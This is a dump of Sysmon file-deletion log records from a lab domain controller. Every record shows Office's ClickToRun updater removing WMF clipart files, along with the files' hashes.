14:55:09.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01701_.WMFMD5=69DA463C289EE2D9CB042A954646BB99,SHA256=0CE5F7CB1E9D6AFA6B6C427232248E8D6E9EFFFC46C9DDFDC41DDAED2D2FCAD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066291Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01682_.WMFMD5=89B35D5A5AC16AADA7B8F5B852468CDB,SHA256=B106BCB0E5694FD4668640A8F5212F8386C14E06D5B539B4F5D0F84B1A755B33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066290Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01680_.WMFMD5=1CED621F1F9CC0B27205F35322C3C16D,SHA256=A7D04C1CED7DEE5F984CCF95B8B56A6A80745C2C114BCD808C145B4F9075DDDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066289Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01627_.WMFMD5=B1EDD1034020103BC6D1170E398B7406,SHA256=8D4B998D69EE04536B03BD7B7801980F7288339D580497DC817BA7EEBC57C3C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066288Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01474_.WMFMD5=901908B8E3B3E98435FD6CA79CBA61A0,SHA256=9FD061353E2BF70CBB1EC05B42CB4DD79CBC8A54484903757AB7F237303290B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066287Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.673{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01473_.WMFMD5=81B85024B88A8F02603A466BEC0B47D2,SHA256=634240E7D98BC0CEE21E55DE5A313A97FF6C24E2E99BB95364A61FED0BE6A6B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066286Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01472_.WMFMD5=9BB952354F5E0266D87A3C6DE874DBCA,SHA256=8290E4C69C6CC1671E3F18B6EA6626F21FD8EA70371B7D21C34326C553AD690B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066285Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01470_.WMFMD5=86B0EB79CD2EBE5CC3F0E41425BEE063,SHA256=7F30B29779CE3613934796D6A955AF3FCD5D13A239C3D00B75F91A197ED710E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066284Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01468_.WMFMD5=E83EEE8C6809F1965C2B79B39F243866,SHA256=BA0C74F2C229225A2622E2304D523561BB37D8CCCB97576EAB5CB975CE6E6AF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066283Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01421_.WMFMD5=38D94C657E346DC182CFBE95981797B3,SHA256=3B659D5B20F628C1DB6F95BC743816AAB7D6FAA58B5B5C9C2142AA70A4E0DE0B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066282Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01368_.WMFMD5=66297D42AF1C27406662BE29E60243C6,SHA256=3BD0463B6D74E305A2F9C128CB5375BF20A75132E434AF8EC9F4100651B6F131,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066281Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01361_.WMFMD5=7A64D2BBA9FEB4A7FF57F509ACDE5DEE,SHA256=D0F12E5B2B136A3DDA3948B0F26D0E78F6950421312D0E979A0A591617BDE74E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066280Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01358_.WMFMD5=8386C34BD0F580593BE6B1223858D61F,SHA256=3D4234F86F41A90870F1AFAE178B765BF9A42C5DB650C83EDAAABE28550BD3AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066279Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01357_.WMFMD5=D80378B97144D54C6D413BC5E1CD8BB3,SHA256=3D947BC7B7D7DA2A39A272CFCE6D9B9C2D735B57DB3F56F5BC8A761B2D23086F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066278Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01356_.WMFMD5=05CD5D133C376FF70EF4C25626F96B9F,SHA256=E7A835F29402CE494C7944AD45C66898C239EBCFDB74CEF87E5BD74E7D2229E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066277Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01354_.WMFMD5=20B0FE151E611224F6C9B81D8FD9D3C0,SHA256=C8A992FB302347BF658EA5FAB99E2F6705763B7F72A495C54994898C5308A8CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066276Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01293_.WMFMD5=8D084EF1E7526097B727C972ED5D02C0,SHA256=BCAED3233028713BA2D74C3272FACC94DC389270E10B3012051E1A22FAC71439,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066275Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01164_.WMFMD5=9212B55711A7C28FDD8C637A626B1038,SHA256=6BC1F39BB44469974343FE32CF27EE35650251F320A42B8F027F53C213956E64,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066274Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01161_.WMFMD5=0BCE966FAB406ABE7909422E4B9189A1,SHA256=C1B7C3C7EC7EA72B89C7E12690260BF52C0919125DE23856766DCC1115CF0C50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066273Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01158_.WMFMD5=C7E67B65C1BDE8049DD3F94AC2E89505,SHA256=DFF719FDD8CBEC97050E71E92F70CDA6763B2DDA821BEBB6AFE0CCC191DBD06D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066272Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01157_.WMFMD5=606D2D482BF3C0CC40337E1BFD8C50CB,SHA256=850DF1A28EA24DEC4670C2E49C2330A5CBD8D4F4D8E8C668EDA423F267830AB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066271Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01154_.WMFMD5=ED3C2CF8391F534D28D4791261431486,SHA256=E5652CB469783B9034C6C2BA1CF8FF02B20AD8D59CAB93C074780BF792868F33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066270Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01152_.WMFMD5=B7B2DA8C303FCBC5AA682442A4FF316E,SHA256=D418BC180096751D0F9A22CA8E05E89AE6184F18A63A09FD2E30114F89DE6FE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066269Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01149_.WMFMD5=5E1DE7FC22C6656ADDF5F5B79CD0685D,SHA256=F2E608FBC14293914F185406F0D466DF3456C533EFA6AA49E79A48D5FCC4A020,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066268Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01148_.WMFMD5=606BD89CFCF656D04F5A358D1EE7202C,SHA256=D9E074FCD0401D7CDD1BA1D01975AF99E6043C562BE730127B933F5E8B9480E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066267Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01141_.WMFMD5=28145F80DFA6FA8DFF6A68FB2EB052A3,SHA256=A4485C93F86129CB8D9AF9F7E8A7F55F314C340072794DE4840D986B714F67FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066266Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01130_.WMFMD5=097F9ACD1635A2EFE38837B1EEA9A3A3,SHA256=EDC204080E2591284061834E242C2A8505CD76B88F481AA10E826D9ED4A6760A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066265Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01126_.WMFMD5=19E93D86A957F79A6D76632550F85EAD,SHA256=E6F61AE259B189495DD30F297524D07CD40B34D56A717AC4001AE1C7A918E88A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066264Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01123_.WMFMD5=AFB9B411695533FF744AB52FBFF73CEA,SHA256=08B4DF8815359DCB75E451478A26DB2FCF414085E3C8219357D6CB122A91714E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066263Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01069_.WMFMD5=136EE03A297E5D58C656C649D0E891D0,SHA256=DF1BB6B7EA322550A85A5A94F34526AC1CD08D5EF40D4034459E3AD64190D74E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066262Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01066_.WMFMD5=49FC784BE2EAA453C9E3B4F5085824CE,SHA256=392048903E7009C6158CF8E39532991A95EFB6BD7B47343B26599CB92550D834,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066261Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA01064_.WMFMD5=CB8D3198E84B0A6C71F8F28D2C60BD83,SHA256=BC659FAC9ACDA1DEC4BD06E6044EA57C6613C2B79D8386C92312488ECF9B7D22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066260Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00932_.WMFMD5=907E2DE17829BB2D20E35B9E4BF2A143,SHA256=C92E1700FD2D148DA2CD89526B40E0731E8CD70666CAEABEDB56589A612337EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066259Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00810_.WMFMD5=AA4DCA0AA03E706A36063ABF9D839BF6,SHA256=D49B5C82C0F89467B186862FFA4BDFD815344C7883462E2FB034D8CA4FCBC610,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066258Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00809_.WMFMD5=90DEE1F39B7373A88AEBF02E7A73BBCA,SHA256=E602C44EEB6D3D371C21ED5B0046723578EDE1D714E45992A6B8330AF89311ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066257Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00808_.WMFMD5=6D0E4BA1FE82F8F4F1BE7378F886DD0A,SHA256=42B43FBB44F77053DB90DE862C015D948CF510823AC2BC299A18EE8A85BD9D29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066256Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00807_.WMFMD5=2C834BA0646B2E6DB95B2A44E3639FA0,SHA256=0A40D47B6E29911D70B4B0D6CA2A54481A825E6DD8CF78B4C94449C893AC525E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066255Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00806_.WMFMD5=8633AF5C09B1CCFF10FF5289B9FC8137,SHA256=5A8529FC36AFBA1BA742008DE21847D746CC074998EA571E73B9C36042E122D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066254Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00798_.WMFMD5=163B1277B7E304FAEAE8470C6D09ED4C,SHA256=0FCB9453D8ABBB0733D2C412E68C02F973A7BF2BE9CF51A8FAD6BD3FD512F7E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066253Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00784_.WMFMD5=EB5FDEE7C07A2619113A3F3406F08913,SHA256=21CA16CBC1B33ED1600258BF04C739EB1E5DF2982898B58FAD9B5D1C19912A2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066252Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00641_.WMFMD5=B70C6E46C999BA6143A8353D5173585C,SHA256=2D034265C682757A18FA3B5A5D7319E42A65ED6125DB9CA65ED1EACE266A3E8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066251Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00538_.WMFMD5=911129B057F8E32629495EFB356829B3,SHA256=B39759A0AD64C8770978051128E34D4D66CBC22940B5B8AB8197E98F5E05E05F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066250Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00532_.WMFMD5=76F59C84A6B3E49A20D4FB7752E65B25,SHA256=417E868B07804CB1B7D5512012C8C2E448F7B3A71F393203F46298DE726E74CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066249Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00530_.WMFMD5=0291E6ED1E087CF13E65B435D7749404,SHA256=977EBCAD4A85C038346E40F0C307E1E4B231B279932F762B04B1C5FB45EA90C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000066248Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:09.611{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\CLIPART\PUB60COR\NA00525_.WMFMD5=ADAD5435BC2BE7019BA50D3B19F10DBC,SHA256=0FC99DBF325952541448492BF01E814601EBF3F88F85AC91A4E9E454FD944202,IMPHASH=00000000000000000000000000000000falsetrue 